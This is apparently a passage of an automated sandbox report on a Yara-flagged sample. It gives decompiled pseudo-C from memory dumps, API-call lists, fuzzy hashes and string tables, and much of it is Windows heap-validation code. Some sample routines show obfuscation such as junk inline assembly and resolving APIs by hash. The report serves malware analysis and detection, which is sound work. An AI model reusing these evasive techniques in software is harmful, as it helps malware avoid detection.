                                  						_pop(__edi);
                                  					}
                                  					_pop(__esi);
                                  					__esp = __ebp;
                                  					_pop(__ebp);
                                  					return __eax;
                                  				}
                                  			}








                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 4b8697be5a983f66cd637a906566cd08e1f134ba96c1291396bba321000a867d
                                  • Instruction ID: c0a974f67d58cd21688ef725629d73523991c29b68bfafb4795568a75bf5ecb8
                                  • Opcode Fuzzy Hash: 4b8697be5a983f66cd637a906566cd08e1f134ba96c1291396bba321000a867d
                                  • Instruction Fuzzy Hash: ED01FE31A803247BEB21A6A54C43FEF7B6CAB40F54F05415DFE04BA1C1D6A9590647E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                  				char _v67;
                                  				char _v68;
                                  				void* _t11;
                                  				intOrPtr* _t12;
                                  				int _t13;
                                  				long _t20;
                                  				intOrPtr _t22;
                                  				intOrPtr* _t23;
                                  				void* _t24;
                                  
                                  				_v68 = 0;
                                  				E0041B850( &_v67, 0, 0x3f);
                                  				_t11 = E0041C3F0( &_v68, 3);
                                  				_t22 = _a4;
                                  				_push(_t24);
                                  				asm("rcl byte [edx-0x7d], 0xc6");
                                  				asm("sbb al, 0x56"); // executed
                                  				E0040ACC0(); // executed
                                  				_t12 = E00414E10(_t22, _t11, 0, 0, 0xc4e7b6d6);
                                  				_t23 = _t12;
                                  				if(_t23 != 0) {
                                  					_t20 = _a8;
                                  					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                  					_t30 = _t13;
                                  					if(_t13 == 0) {
                                  						_t13 =  *_t23(_t20, 0x8003, _t24 + (E0040A450(_t30, 1, 8) & 0x000000ff) - 0x40, _t13);
                                  					}
                                  					return _t13;
                                  				}
                                  				return _t12;
                                  			}













                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                  • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                  • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                  • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                  				char _t10;
                                  				void* _t15;
                                  
                                  				_t3 = _a4 + 0xc74; // 0xc74
                                  				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                  				return _t10;
                                  			}






                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041A0A0(intOrPtr _a4, int _a8) {
                                  				void* _t10;
                                  
                                  				_t5 = _a4;
                                  				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                  				ExitProcess(_a8);
                                  			}





                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Strings
                                  • *** Inpage error in %ws:%s, xrefs: 0194B418
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 0194B352
                                  • a NULL pointer, xrefs: 0194B4E0
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0194B39B
                                  • *** enter .exr %p for the exception record, xrefs: 0194B4F1
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0194B2F3
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0194B476
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0194B47D
                                  • Go determine why that thread has not released the critical section., xrefs: 0194B3C5
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B38F
                                  • an invalid address, %p, xrefs: 0194B4CF
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B3D6
                                  • The critical section is owned by thread %p., xrefs: 0194B3B9
                                  • *** then kb to get the faulting stack, xrefs: 0194B51C
                                  • The instruction at %p tried to %s , xrefs: 0194B4B6
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 0194B48F
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0194B323
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0194B2DC
                                  • The resource is owned exclusively by thread %p, xrefs: 0194B374
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0194B314
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0194B53F
                                  • This failed because of error %Ix., xrefs: 0194B446
                                  • write to, xrefs: 0194B4A6
                                  • <unknown>, xrefs: 0194B27E, 0194B2D1, 0194B350, 0194B399, 0194B417, 0194B48E
                                  • The resource is owned shared by %d threads, xrefs: 0194B37E
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0194B305
                                  • read from, xrefs: 0194B4AD, 0194B4B2
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0194B484
                                  • *** enter .cxr %p for the context, xrefs: 0194B50D
                                  • The instruction at %p referenced memory at %p., xrefs: 0194B432
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E01951C06() {
                                  				signed int _t27;
                                  				char* _t104;
                                  				char* _t105;
                                  				intOrPtr _t113;
                                  				intOrPtr _t115;
                                  				intOrPtr _t117;
                                  				intOrPtr _t119;
                                  				intOrPtr _t120;
                                  
                                  				_t105 = 0x18748a4;
                                  				_t104 = "HEAP: ";
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E0189B150();
                                  				} else {
                                  					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				_push( *0x198589c);
                                  				E0189B150("Heap error detected at %p (heap handle %p)\n",  *0x19858a0);
                                  				_t27 =  *0x1985898; // 0x0
                                  				if(_t27 <= 0xf) {
                                  					switch( *((intOrPtr*)(_t27 * 4 +  &M01951E96))) {
                                  						case 0:
                                  							_t105 = "heap_failure_internal";
                                  							goto L21;
                                  						case 1:
                                  							goto L21;
                                  						case 2:
                                  							goto L21;
                                  						case 3:
                                  							goto L21;
                                  						case 4:
                                  							goto L21;
                                  						case 5:
                                  							goto L21;
                                  						case 6:
                                  							goto L21;
                                  						case 7:
                                  							goto L21;
                                  						case 8:
                                  							goto L21;
                                  						case 9:
                                  							goto L21;
                                  						case 0xa:
                                  							goto L21;
                                  						case 0xb:
                                  							goto L21;
                                  						case 0xc:
                                  							goto L21;
                                  						case 0xd:
                                  							goto L21;
                                  						case 0xe:
                                  							goto L21;
                                  						case 0xf:
                                  							goto L21;
                                  					}
                                  				}
                                  				L21:
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E0189B150();
                                  				} else {
                                  					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				_push(_t105);
                                  				E0189B150("Error code: %d - %s\n",  *0x1985898);
                                  				_t113 =  *0x19858a4; // 0x0
                                  				if(_t113 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E0189B150();
                                  					} else {
                                  						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E0189B150("Parameter1: %p\n",  *0x19858a4);
                                  				}
                                  				_t115 =  *0x19858a8; // 0x0
                                  				if(_t115 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E0189B150();
                                  					} else {
                                  						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E0189B150("Parameter2: %p\n",  *0x19858a8);
                                  				}
                                  				_t117 =  *0x19858ac; // 0x0
                                  				if(_t117 != 0) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E0189B150();
                                  					} else {
                                  						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E0189B150("Parameter3: %p\n",  *0x19858ac);
                                  				}
                                  				_t119 =  *0x19858b0; // 0x0
                                  				if(_t119 != 0) {
                                  					L41:
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push(_t104);
                                  						E0189B150();
                                  					} else {
                                  						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					_push( *0x19858b4);
                                  					E0189B150("Last known valid blocks: before - %p, after - %p\n",  *0x19858b0);
                                  				} else {
                                  					_t120 =  *0x19858b4; // 0x0
                                  					if(_t120 != 0) {
                                  						goto L41;
                                  					}
                                  				}
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  					_push(_t104);
                                  					E0189B150();
                                  				} else {
                                  					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  				}
                                  				return E0189B150("Stack trace available at %p\n", 0x19858c0);
                                  			}












                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                  • API String ID: 0-2897834094
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E01954AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                  				signed int _v6;
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t189;
                                  				intOrPtr _t191;
                                  				intOrPtr _t210;
                                  				signed int _t225;
                                  				signed char _t231;
                                  				intOrPtr _t232;
                                  				unsigned int _t245;
                                  				intOrPtr _t249;
                                  				intOrPtr _t259;
                                  				signed int _t281;
                                  				signed int _t283;
                                  				intOrPtr _t284;
                                  				signed int _t288;
                                  				signed int* _t294;
                                  				signed int* _t298;
                                  				intOrPtr* _t299;
                                  				intOrPtr* _t300;
                                  				signed int _t307;
                                  				signed int _t309;
                                  				signed short _t312;
                                  				signed short _t315;
                                  				signed int _t317;
                                  				signed int _t320;
                                  				signed int _t322;
                                  				signed int _t326;
                                  				signed int _t327;
                                  				void* _t328;
                                  				signed int _t332;
                                  				signed int _t340;
                                  				signed int _t342;
                                  				signed char _t344;
                                  				signed int* _t345;
                                  				void* _t346;
                                  				signed char _t352;
                                  				signed char _t367;
                                  				signed int _t374;
                                  				intOrPtr* _t378;
                                  				signed int _t380;
                                  				signed int _t385;
                                  				signed char _t390;
                                  				unsigned int _t392;
                                  				signed char _t395;
                                  				unsigned int _t397;
                                  				intOrPtr* _t400;
                                  				signed int _t402;
                                  				signed int _t405;
                                  				intOrPtr* _t406;
                                  				signed int _t407;
                                  				intOrPtr _t412;
                                  				void* _t414;
                                  				signed int _t415;
                                  				signed int _t416;
                                  				signed int _t429;
                                  
                                  				_v16 = _v16 & 0x00000000;
                                  				_t189 = 0;
                                  				_v8 = _v8 & 0;
                                  				_t332 = __edx;
                                  				_v12 = 0;
                                  				_t414 = __ecx;
                                  				_t415 = __edx;
                                  				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                  					L88:
                                  					_t416 = _v16;
                                  					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                  						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                  						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                  							L107:
                                  							return 1;
                                  						}
                                  						_t191 =  *[fs:0x30];
                                  						__eflags =  *(_t191 + 0xc);
                                  						if( *(_t191 + 0xc) == 0) {
                                  							_push("HEAP: ");
                                  							E0189B150();
                                  						} else {
                                  							E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  						}
                                  						_push(_v12);
                                  						_push( *((intOrPtr*)(_t332 + 0x30)));
                                  						_push(_t332);
                                  						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                  						L122:
                                  						E0189B150();
                                  						L119:
                                  						return 0;
                                  					}
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push("HEAP: ");
                                  						E0189B150();
                                  					} else {
                                  						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					_push(_t416);
                                  					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                  					_push(_t332);
                                  					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                  					goto L122;
                                  				} else {
                                  					goto L1;
                                  				}
                                  				do {
                                  					L1:
                                  					 *_a16 = _t415;
                                  					if( *(_t414 + 0x4c) != 0) {
                                  						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                  						 *_t415 = _t392;
                                  						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                  						_t424 = _t392 >> 0x18 - _t352;
                                  						if(_t392 >> 0x18 != _t352) {
                                  							_push(_t352);
                                  							E0194FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                  						}
                                  					}
                                  					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                  						_t210 =  *[fs:0x30];
                                  						__eflags =  *(_t210 + 0xc);
                                  						if( *(_t210 + 0xc) == 0) {
                                  							_push("HEAP: ");
                                  							E0189B150();
                                  						} else {
                                  							E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  						}
                                  						_push(_v8 & 0x0000ffff);
                                  						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                  						__eflags = _t340;
                                  						_push(_t340);
                                  						E0189B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                  						L117:
                                  						__eflags =  *(_t414 + 0x4c);
                                  						if( *(_t414 + 0x4c) != 0) {
                                  							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                  							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                  							__eflags =  *_t415;
                                  						}
                                  						goto L119;
                                  					}
                                  					_t225 =  *_t415 & 0x0000ffff;
                                  					_t390 =  *(_t415 + 2);
                                  					_t342 = _t225;
                                  					_v8 = _t342;
                                  					_v20 = _t342;
                                  					_v28 = _t225 << 3;
                                  					if((_t390 & 0x00000001) == 0) {
                                  						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                  						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                  						__eflags = _t344 & 0x00000001;
                                  						if((_t344 & 0x00000001) == 0) {
                                  							L66:
                                  							_t345 = _a12;
                                  							 *_a8 =  *_a8 + 1;
                                  							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                  							__eflags =  *_t345;
                                  							L67:
                                  							_t231 =  *(_t415 + 6);
                                  							if(_t231 == 0) {
                                  								_t346 = _t414;
                                  							} else {
                                  								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                  							}
                                  							if(_t346 != _t332) {
                                  								_t232 =  *[fs:0x30];
                                  								__eflags =  *(_t232 + 0xc);
                                  								if( *(_t232 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E0189B150();
                                  								} else {
                                  									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_push( *(_t415 + 6) & 0x000000ff);
                                  								_push(_t415);
                                  								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                  								goto L95;
                                  							} else {
                                  								if( *((char*)(_t415 + 7)) != 3) {
                                  									__eflags =  *(_t414 + 0x4c);
                                  									if( *(_t414 + 0x4c) != 0) {
                                  										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                  										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                  										__eflags =  *_t415;
                                  									}
                                  									_t415 = _t415 + _v28;
                                  									__eflags = _t415;
                                  									goto L86;
                                  								}
                                  								_t245 =  *(_t415 + 0x1c);
                                  								if(_t245 == 0) {
                                  									_t395 =  *_t415 & 0x0000ffff;
                                  									_v6 = _t395 >> 8;
                                  									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                  									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                  										__eflags =  *(_t414 + 0x4c);
                                  										if( *(_t414 + 0x4c) != 0) {
                                  											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                  											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                  											__eflags =  *_t415;
                                  										}
                                  										goto L107;
                                  									}
                                  									_t249 =  *[fs:0x30];
                                  									__eflags =  *(_t249 + 0xc);
                                  									if( *(_t249 + 0xc) == 0) {
                                  										_push("HEAP: ");
                                  										E0189B150();
                                  									} else {
                                  										E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  									}
                                  									_push( *((intOrPtr*)(_t332 + 0x28)));
                                  									_push(_t415);
                                  									_push("Heap block at %p is not last block in segment (%p)\n");
                                  									L95:
                                  									E0189B150();
                                  									goto L117;
                                  								}
                                  								_v12 = _v12 + 1;
                                  								_v16 = _v16 + (_t245 >> 0xc);
                                  								if( *(_t414 + 0x4c) != 0) {
                                  									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                  									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                  								}
                                  								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                  								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                  									L82:
                                  									_v8 = _v8 & 0x00000000;
                                  									goto L86;
                                  								} else {
                                  									if( *(_t414 + 0x4c) != 0) {
                                  										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                  										 *_t415 = _t397;
                                  										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                  										_t442 = _t397 >> 0x18 - _t367;
                                  										if(_t397 >> 0x18 != _t367) {
                                  											_push(_t367);
                                  											E0194FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                  										}
                                  									}
                                  									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                  										_t259 =  *[fs:0x30];
                                  										__eflags =  *(_t259 + 0xc);
                                  										if( *(_t259 + 0xc) == 0) {
                                  											_push("HEAP: ");
                                  											E0189B150();
                                  										} else {
                                  											E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  										}
                                  										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                  										_push(_t415);
                                  										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                  										goto L95;
                                  									} else {
                                  										if( *(_t414 + 0x4c) != 0) {
                                  											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                  											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                  										}
                                  										goto L82;
                                  									}
                                  								}
                                  							}
                                  						}
                                  						_t281 = _v28 + 0xfffffff0;
                                  						_v24 = _t281;
                                  						__eflags = _t390 & 0x00000002;
                                  						if((_t390 & 0x00000002) != 0) {
                                  							__eflags = _t281 - 4;
                                  							if(_t281 > 4) {
                                  								_t281 = _t281 - 4;
                                  								__eflags = _t281;
                                  								_v24 = _t281;
                                  							}
                                  						}
                                  						__eflags = _t390 & 0x00000008;
                                  						if((_t390 & 0x00000008) == 0) {
                                  							_t102 = _t415 + 0x10; // -8
                                  							_t283 = E018ED540(_t102, _t281, 0xfeeefeee);
                                  							_v20 = _t283;
                                  							__eflags = _t283 - _v24;
                                  							if(_t283 != _v24) {
                                  								_t284 =  *[fs:0x30];
                                  								__eflags =  *(_t284 + 0xc);
                                  								if( *(_t284 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E0189B150();
                                  								} else {
                                  									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_t288 = _v20 + 8 + _t415;
                                  								__eflags = _t288;
                                  								_push(_t288);
                                  								_push(_t415);
                                  								_push("Free Heap block %p modified at %p after it was freed\n");
                                  								goto L95;
                                  							}
                                  							goto L66;
                                  						} else {
                                  							_t374 =  *(_t415 + 8);
                                  							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                  							_v24 = _t374;
                                  							_v28 = _t400;
                                  							_t294 =  *(_t374 + 4);
                                  							__eflags =  *_t400 - _t294;
                                  							if( *_t400 != _t294) {
                                  								L64:
                                  								_push(_t374);
                                  								_push( *_t400);
                                  								_t101 = _t415 + 8; // -16
                                  								E0195A80D(_t414, 0xd, _t101, _t294);
                                  								goto L86;
                                  							}
                                  							_t56 = _t415 + 8; // -16
                                  							__eflags =  *_t400 - _t56;
                                  							_t374 = _v24;
                                  							if( *_t400 != _t56) {
                                  								goto L64;
                                  							}
                                  							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                  							_t402 =  *(_t414 + 0xb4);
                                  							__eflags = _t402;
                                  							if(_t402 == 0) {
                                  								L35:
                                  								_t298 = _v28;
                                  								 *_t298 = _t374;
                                  								 *(_t374 + 4) = _t298;
                                  								__eflags =  *(_t415 + 2) & 0x00000008;
                                  								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                  									L39:
                                  									_t377 =  *_t415 & 0x0000ffff;
                                  									_t299 = _t414 + 0xc0;
                                  									_v28 =  *_t415 & 0x0000ffff;
                                  									 *(_t415 + 2) = 0;
                                  									 *((char*)(_t415 + 7)) = 0;
                                  									__eflags =  *(_t414 + 0xb4);
                                  									if( *(_t414 + 0xb4) == 0) {
                                  										_t378 =  *_t299;
                                  									} else {
                                  										_t378 = E018BE12C(_t414, _t377);
                                  										_t299 = _t414 + 0xc0;
                                  									}
                                  									__eflags = _t299 - _t378;
                                  									if(_t299 == _t378) {
                                  										L51:
                                  										_t300 =  *((intOrPtr*)(_t378 + 4));
                                  										__eflags =  *_t300 - _t378;
                                  										if( *_t300 != _t378) {
                                  											_push(_t378);
                                  											_push( *_t300);
                                  											__eflags = 0;
                                  											E0195A80D(0, 0xd, _t378, 0);
                                  										} else {
                                  											_t87 = _t415 + 8; // -16
                                  											_t406 = _t87;
                                  											 *_t406 = _t378;
                                  											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                  											 *_t300 = _t406;
                                  											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                  										}
                                  										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                  										_t405 =  *(_t414 + 0xb4);
                                  										__eflags = _t405;
                                  										if(_t405 == 0) {
                                  											L61:
                                  											__eflags =  *(_t414 + 0x4c);
                                  											if(__eflags != 0) {
                                  												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                  												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                  											}
                                  											goto L86;
                                  										} else {
                                  											_t380 =  *_t415 & 0x0000ffff;
                                  											while(1) {
                                  												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                  												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                  													break;
                                  												}
                                  												_t307 =  *_t405;
                                  												__eflags = _t307;
                                  												if(_t307 == 0) {
                                  													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                  													L60:
